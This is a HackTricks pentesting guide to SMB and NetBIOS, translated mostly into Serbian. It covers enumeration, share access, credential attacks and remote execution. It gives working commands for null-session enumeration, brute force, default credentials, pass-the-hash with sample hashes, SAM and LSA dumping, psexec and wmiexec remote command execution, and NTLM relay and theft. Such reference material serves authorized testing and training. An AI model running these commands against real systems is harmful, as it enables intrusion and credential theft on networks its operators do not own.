28 KiB
139,445 - Pentesting SMB
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Port 139
Mrežni osnovni ulazno-izlazni sistem** (NetBIOS)** je softverski protokol dizajniran da omogući aplikacijama, računarima i radnim stanicama unutar lokalne mreže (LAN) da komuniciraju sa mrežnim hardverom i olakšaju prenos podataka kroz mrežu. Identifikacija i lokacija softverskih aplikacija koje rade na NetBIOS mreži postiže se kroz njihove NetBIOS nazive, koji mogu imati do 16 karaktera i često se razlikuju od imena računara. NetBIOS sesija između dve aplikacije se pokreće kada jedna aplikacija (koja deluje kao klijent) izda komandu da "pozove" drugu aplikaciju (koja deluje kao server) koristeći TCP Port 139.
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
Port 445
Tehnički, Port 139 se naziva ‘NBT over IP’, dok se Port 445 identifikuje kao ‘SMB over IP’. Akronim SMB označava ‘Server Message Blocks’, koji je takođe modernizovan kao Common Internet File System (CIFS). Kao protokol mrežnog sloja aplikacije, SMB/CIFS se prvenstveno koristi za omogućavanje deljenog pristupa datotekama, štampačima, serijskim portovima i olakšavanje različitih oblika komunikacije između čvorova na mreži.
Na primer, u kontekstu Windows-a, ističe se da SMB može raditi direktno preko TCP/IP, eliminišući potrebu za NetBIOS-om preko TCP/IP, korišćenjem porta 445. S druge strane, na različitim sistemima, primećuje se korišćenje porta 139, što ukazuje na to da se SMB izvršava u kombinaciji sa NetBIOS-om preko TCP/IP.
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
SMB
Protokol Server Message Block (SMB), koji funkcioniše u klijent-server modelu, dizajniran je za regulisanje pristupa datotekama, direktorijumima i drugim mrežnim resursima poput štampača i rutera. Primarno se koristi unutar serije Windows operativnih sistema, SMB obezbeđuje unazadnu kompatibilnost, omogućavajući uređajima sa novijim verzijama Microsoftovog operativnog sistema da besprekorno komuniciraju sa onima koji koriste starije verzije. Pored toga, projekat Samba nudi rešenje slobodnog softvera, omogućavajući implementaciju SMB-a na Linux i Unix sistemima, čime se olakšava međusobna komunikacija putem SMB-a.
Deljenja, koja predstavljaju arbitrarne delove lokalnog fajl sistema, mogu biti obezbeđena od strane SMB servera, čineći hijerarhiju vidljivom klijentu delimično nezavisnom od stvarne strukture servera. Liste kontrole pristupa (ACL), koje definišu prava pristupa, omogućavaju fino podešavanje korisničkih dozvola, uključujući atribute kao što su execute
, read
i full access
. Ove dozvole mogu biti dodeljene pojedinačnim korisnicima ili grupama, na osnovu deljenja, i razlikuju se od lokalnih dozvola postavljenih na serveru.
IPC$ Share
Pristup IPC$ deljenju može se dobiti putem anonimne null sesije, omogućavajući interakciju sa servisima izloženim putem imenovanih cevi. Alat enum4linux
je koristan za ovu svrhu. Kada se pravilno koristi, omogućava sticanje:
- Informacija o operativnom sistemu
- Detalja o matičnoj domeni
- Kompilacije lokalnih korisnika i grupa
- Informacija o dostupnim SMB deljenjima
- Efektivnih bezbednosnih politika sistema
Ova funkcionalnost je ključna za mrežne administratore i bezbednosne profesionalce da procene bezbednosni položaj SMB (Server Message Block) usluga na mreži. enum4linux
pruža sveobuhvatan pregled SMB okruženja ciljnog sistema, što je od suštinskog značaja za identifikaciju potencijalnih ranjivosti i osiguranje da su SMB usluge pravilno zaštićene.
enum4linux -a target_ip
The above command is an example of how enum4linux
might be used to perform a full enumeration against a target specified by target_ip
.
Šta je NTLM
Ako ne znate šta je NTLM ili želite da saznate kako funkcioniše i kako ga zloupotrebiti, ova stranica o NTLM će vam biti veoma zanimljiva, gde je objašnjeno kako ovaj protokol funkcioniše i kako možete iskoristiti to:
{% content-ref url="../windows-hardening/ntlm/" %} ntlm {% endcontent-ref %}
Server Enumeration
Skener mreže u potrazi za hostovima:
nbtscan -r 192.168.0.1/24
SMB сервер верзија
Да бисте пронашли могуће експлоите за SMB верзију, важно је знати која верзија се користи. Ако ове информације не појављују у другим коришћеним алатима, можете:
- Користити MSF помоћни модул _auxiliary/scanner/smb/smb_version
- Или овај скрипт:
#!/bin/sh
#Author: rewardone
#Description:
# Requires root or enough permissions to use tcpdump
# Will listen for the first 7 packets of a null login
# and grab the SMB Version
#Notes:
# Will sometimes not capture or will print multiple
# lines. May need to run a second time for success.
if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
echo "" && sleep .1
Pretraži exploit
msf> search type:exploit platform:windows target:2008 smb
searchsploit microsoft smb
Moguće Kredencijale
Korisničko ime | Uobičajene lozinke |
---|---|
(prazno) | (prazno) |
gost | (prazno) |
Administrator, admin | (prazno), lozinka, administrator, admin |
arcserve | arcserve, backup |
tivoli, tmersrvd | tivoli, tmersrvd, admin |
backupexec, backup | backupexec, backup, arcada |
test, lab, demo | lozinka, test, lab, demo |
Brute Force
SMB Okruženje Informacije
Dobijanje Informacija
#Dump interesting information
enum4linux -a [-u "<username>" -p "<passwd>"] <IP>
enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>
nmap --script "safe or smb-enum-*" -p 445 <IP>
#Connect to the rpc
rpcclient -U "" -N <IP> #No creds
rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb --pw-nt-hash
rpcclient -U "username%passwd" <IP> #With creds
#You can use querydispinfo and enumdomusers to query user information
#Dump user information
/usr/share/doc/python3-impacket/examples/samrdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/samrdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
#Map possible RPC endpoints
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
Enumerate Users, Groups & Logged On Users
Ove informacije bi već trebalo da budu prikupljene iz enum4linux i enum4linux-ng
crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups --loggedon-users [-u <username> -p <password>]
ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " "
rpcclient -U "" -N 10.10.10.10
enumdomusers
enumdomgroups
Enumerate local users
lookupsid.py -no-pass hostname.local
Oneliner
for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
Metasploit - Enumeracija lokalnih korisnika
use auxiliary/scanner/smb/smb_lookupsid
set rhosts hostname.local
run
Enumerating LSARPC and SAMR rpcclient
{% content-ref url="pentesting-smb/rpcclient-enumeration.md" %} rpcclient-enumeration.md {% endcontent-ref %}
GUI konekcija sa linux-a
U terminalu:
xdg-open smb://cascade.htb/
U prozoru za pretragu fajlova (nautilus, thunar, itd)
smb://friendzone.htb/general/
Enumeracija deljenih foldera
Lista deljenih foldera
Uvek se preporučuje da proverite da li možete pristupiti bilo čemu, ako nemate kredencijale pokušajte koristiti null kredencijale/gost korisnik.
smbclient --no-pass -L //<IP> # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
smbmap -H <IP> [-P <PORT>] #Null user
smbmap -u "username" -p "password" -H <IP> [-P <PORT>] #Creds
smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] #Pass-the-Hash
smbmap -R -u "username" -p "password" -H <IP> [-P <PORT>] #Recursive list
crackmapexec smb <IP> -u '' -p '' --shares #Null user
crackmapexec smb <IP> -u 'username' -p 'password' --shares #Guest user
crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares #Guest user
Povezivanje/Lista deljene fascikle
#Connect using smbclient
smbclient --no-pass //<IP>/<Folder>
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
#Use --no-pass -c 'recurse;ls' to list recursively with smbclient
#List with smbmap, without folder it list everything
smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive list
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-Recursive list
smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash
Ručno enumerisanje Windows deljenja i povezivanje na njih
Može biti moguće da ste ograničeni u prikazivanju bilo kakvih deljenja host mašine i kada pokušate da ih navedete, čini se da ne postoje deljenja na koja možete da se povežete. Stoga bi moglo biti korisno pokušati ručno povezivanje na deljenje. Da biste ručno enumerisali deljenja, možda biste želeli da tražite odgovore poput NT_STATUS_ACCESS_DENIED i NT_STATUS_BAD_NETWORK_NAME, kada koristite važeću sesiju (npr. null sesija ili važeće akreditive). Ovi odgovori mogu ukazivati na to da li deljenje postoji i nemate pristup njemu ili deljenje uopšte ne postoji.
Uobičajena imena deljenja za Windows ciljeve su
- C$
- D$
- ADMIN$
- IPC$
- PRINT$
- FAX$
- SYSVOL
- NETLOGON
(Uobičajena imena deljenja iz Network Security Assessment 3rd edition)
Možete pokušati da se povežete na njih koristeći sledeću komandu
smbclient -U '%' -N \\\\<IP>\\<SHARE> # null session to connect to a windows share
smbclient -U '<USER>' \\\\<IP>\\<SHARE> # authenticated session to connect to a windows share (you will be prompted for a password)
или за ovaj skript (koristeći null sesiju)
#/bin/bash
ip='<TARGET-IP-HERE>'
shares=('C$' 'D$' 'ADMIN$' 'IPC$' 'PRINT$' 'FAX$' 'SYSVOL' 'NETLOGON')
for share in ${shares[*]}; do
output=$(smbclient -U '%' -N \\\\$ip\\$share -c '')
if [[ -z $output ]]; then
echo "[+] creating a null session is possible for $share" # no output if command goes through, thus assuming that a session was created
else
echo $output # echo error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME)
fi
done
primeri
smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
Enumerirajte deljenja sa Windows-a / bez alata trećih strana
PowerShell
# Retrieves the SMB shares on the locale computer.
Get-SmbShare
Get-WmiObject -Class Win32_Share
# Retrieves the SMB shares on a remote computer.
get-smbshare -CimSession "<computer name or session object>"
# Retrieves the connections established from the local SMB client to the SMB servers.
Get-SmbConnection
CMD konzola
# List shares on the local computer
net share
# List shares on a remote computer (including hidden ones)
net view \\<ip> /all
MMC Snap-in (grafički)
# Shared Folders: Shared Folders > Shares
fsmgmt.msc
# Computer Management: Computer Management > System Tools > Shared Folders > Shares
compmgmt.msc
explorer.exe (grafički), unesite \\<ip>\
da biste videli dostupne ne-skrivene deljene foldere.
Montirajte deljeni folder
mount -t cifs //x.x.x.x/share /mnt/share
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share
Preuzimanje fajlova
Pročitajte prethodne odeljke da biste saznali kako se povezati sa kredencijalima/Pass-the-Hash.
#Search a file and download
sudo smbmap -R Folder -H <IP> -A <FileName> -q # Search the file in recursive mode and download it inside /usr/share/smbmap
#Download all
smbclient //<IP>/<share>
> mask ""
> recurse
> prompt
> mget *
#Download everything to current directory
Commands:
- mask: specificira masku koja se koristi za filtriranje datoteka unutar direktorijuma (npr. "" za sve datoteke)
- recurse: prebacuje rekurziju na (podrazumevano: isključeno)
- prompt: prebacuje traženje imena datoteka na isključeno (podrazumevano: uključeno)
- mget: kopira sve datoteke koje odgovaraju maski sa hosta na klijentsku mašinu
(Informacije iz man stranice smbclient)
Pretraga deljenih foldera domena
- Snaffler****
Snaffler.exe -s -d domain.local -o snaffler.log -v data
- CrackMapExec pauk.
-M spider_plus [--share <share_name>]
--pattern txt
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
Posebno zanimljivi su fajlovi pod nazivom Registry.xml
jer mogu sadržati lozinke za korisnike podešene sa autologon putem Grupske Politike. Ili web.config
fajlovi jer sadrže akreditive.
{% hint style="info" %}
SYSVOL share je čitljiv za sve autentifikovane korisnike u domenu. Tamo možete pronaći mnoge različite batch, VBScript i PowerShell skripte.
Trebalo bi da proverite skripte unutar njega jer biste mogli pronaći osetljive informacije kao što su lozinke.
{% endhint %}
Čitanje Registra
Možda ćete moći da pročitate registry koristeći neke otkrivene akreditive. Impacket reg.py
vam omogućava da probate:
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s
Post Exploitation
Podrazumevana konfiguracija Samba servera se obično nalazi u /etc/samba/smb.conf
i može imati neke opasne konfiguracije:
Podešavanje | Opis |
---|---|
browseable = yes |
Dozvoliti listanje dostupnih deljenja u trenutnom deljenju? |
read only = no |
Zabraniti kreiranje i modifikaciju fajlova? |
writable = yes |
Dozvoliti korisnicima da kreiraju i modifikuju fajlove? |
guest ok = yes |
Dozvoliti povezivanje na servis bez korišćenja lozinke? |
enable privileges = yes |
Poštovati privilegije dodeljene specifičnom SID-u? |
create mask = 0777 |
Koje dozvole moraju biti dodeljene novokreiranim fajlovima? |
directory mask = 0777 |
Koje dozvole moraju biti dodeljene novokreiranim direktorijumima? |
logon script = script.sh |
Koji skript treba da se izvrši prilikom prijavljivanja korisnika? |
magic script = script.sh |
Koji skript treba da se izvrši kada se skript zatvori? |
magic output = script.out |
Gde treba da se sačuva izlaz magičnog skripta? |
Komanda smbstatus
daje informacije o serveru i o tome ko je povezan.
Authenticate using Kerberos
Možete autentifikovati se na kerberos koristeći alate smbclient i rpcclient:
smbclient --kerberos //ws01win10.domain.com/C$
rpcclient -k ws01win10.domain.com
Izvršavanje komandi
crackmapexec
crackmapexec može izvršavati komande zloupotrebljavajući bilo koji od mmcexec, smbexec, atexec, wmiexec, pri čemu je wmiexec podrazumevani metod. Možete naznačiti koju opciju preferirate da koristite sa parametrima --exec-method
:
apt-get install crackmapexec
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' #Execute Powershell
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami #Excute cmd
crackmapexec smb 192.168.10.11 -u Administrator -H <NTHASH> -x whoami #Pass-the-Hash
# Using --exec-method {mmcexec,smbexec,atexec,wmiexec}
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam #Dump SAM
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa #Dump LSASS in memmory hashes
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sessions #Get sessions (
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --loggedon-users #Get logged-on users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --disks #Enumerate the disks
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --users #Enumerate users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --groups # Enumerate groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --local-groups # Enumerate local groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol #Get password policy
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute #RID brute
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH> #Pass-The-Hash
psexec/smbexec
Obe opcije će napraviti novu uslugu (koristeći \pipe\svcctl putem SMB) na žrtvenoj mašini i koristiti je da izvrši nešto (psexec će otpremiti izvršni fajl na ADMIN$ share, a smbexec će se povezati na cmd.exe/powershell.exe i staviti u argumente payload --file-less technique--).
Više informacija o psexec i smbexec.
U kali se nalazi na /usr/share/doc/python3-impacket/examples/
#If no password is provided, it will be prompted
./psexec.py [[domain/]username[:password]@]<targetName or address>
./psexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
psexec \\192.168.122.66 -u Administrator -p 123456Ww
psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash
Koristeći parameter-k
možete se autentifikovati protiv kerberos umesto NTLM
wmiexec/dcomexec
Tajno izvršite komandnu ljusku bez dodirivanja diska ili pokretanja nove usluge koristeći DCOM preko porta 135.
U kali se nalazi na /usr/share/doc/python3-impacket/examples/
#If no password is provided, it will be prompted
./wmiexec.py [[domain/]username[:password]@]<targetName or address> #Prompt for password
./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
Koristeći parameter -k
, možete se autentifikovati protiv kerberos umesto NTLM.
#If no password is provided, it will be prompted
./dcomexec.py [[domain/]username[:password]@]<targetName or address>
./dcomexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
AtExec
Izvršite komande putem Task Scheduler-a (koristeći \pipe\atsvc preko SMB).
U kali se nalazi na /usr/share/doc/python3-impacket/examples/
./atexec.py [[domain/]username[:password]@]<targetName or address> "command"
./atexec.py -hashes <LM:NT> administrator@10.10.10.175 "whoami"
Impacket референца
https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/
Брутефорс корисничких креденцијала
Ово се не препоручује, можете блокирати налог ако пређете максималан дозвољени број покушаја
nmap --script smb-brute -p 445 <IP>
ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name
SMB relay attack
Ovaj napad koristi Responder alat za hvatanje SMB autentifikacionih sesija na internom mreži, i preusmerava ih na ciljanu mašinu. Ako je autentifikacija sesija uspešna, automatski ćete biti prebačeni u sistem shell.
Više informacija o ovom napadu ovde.
SMB-Trap
Windows biblioteka URLMon.dll automatski pokušava da se autentifikuje na host kada stranica pokušava da pristupi nekom sadržaju putem SMB, na primer: img src="\\10.10.10.10\path\image.jpg"
To se dešava sa funkcijama:
- URLDownloadToFile
- URLDownloadToCache
- URLOpenStream
- URLOpenBlockingStream
Koje koriste neki pregledači i alati (kao što je Skype)
SMBTrap using MitMf
NTLM Theft
Slično SMB Trapping-u, postavljanje malicioznih fajlova na ciljani sistem (putem SMB, na primer) može izazvati pokušaj SMB autentifikacije, omogućavajući da se NetNTLMv2 hash presretne pomoću alata kao što je Responder. Hash se zatim može razbiti offline ili koristiti u SMB relay attack.
HackTricks Automatic Commands
Protocol_Name: SMB #Protocol Abbreviation if there is one.
Port_Number: 137,138,139 #Comma separated if there is more than one.
Protocol_Description: Server Message Block #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for SMB
Note: |
While Port 139 is known technically as ‘NBT over IP’, Port 445 is ‘SMB over IP’. SMB stands for ‘Server Message Blocks’. Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network.
#These are the commands I run in order every time I see an open SMB port
With No Creds
nbtscan {IP}
smbmap -H {IP}
smbmap -H {IP} -u null -p null
smbmap -H {IP} -u guest
smbclient -N -L //{IP}
smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
rpcclient {IP}
rpcclient -U "" {IP}
crackmapexec smb {IP}
crackmapexec smb {IP} --pass-pol -u "" -p ""
crackmapexec smb {IP} --pass-pol -u "guest" -p ""
GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all
GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"
getArch.py -target {IP}
With Creds
smbmap -H {IP} -u {Username} -p {Password}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
crackmapexec smb {IP} -u {Username} -p {Password} --shares
GetADUsers.py {Domain_Name}/{Username}:{Password} -all
GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request
https://book.hacktricks.xyz/pentesting/pentesting-smb
Entry_2:
Name: Enum4Linux
Description: General SMB Scan
Command: enum4linux -a {IP}
Entry_3:
Name: Nmap SMB Scan 1
Description: SMB Vuln Scan With Nmap
Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}
Entry_4:
Name: Nmap Smb Scan 2
Description: SMB Vuln Scan With Nmap (Less Specific)
Command: nmap --script 'smb-vuln*' -Pn -p 139,445 {IP}
Entry_5:
Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb
Entry_6:
Name: SMB/SMB2 139/445 consolesless mfs enumeration
Description: SMB/SMB2 139/445 enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'
{% hint style="success" %}
Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.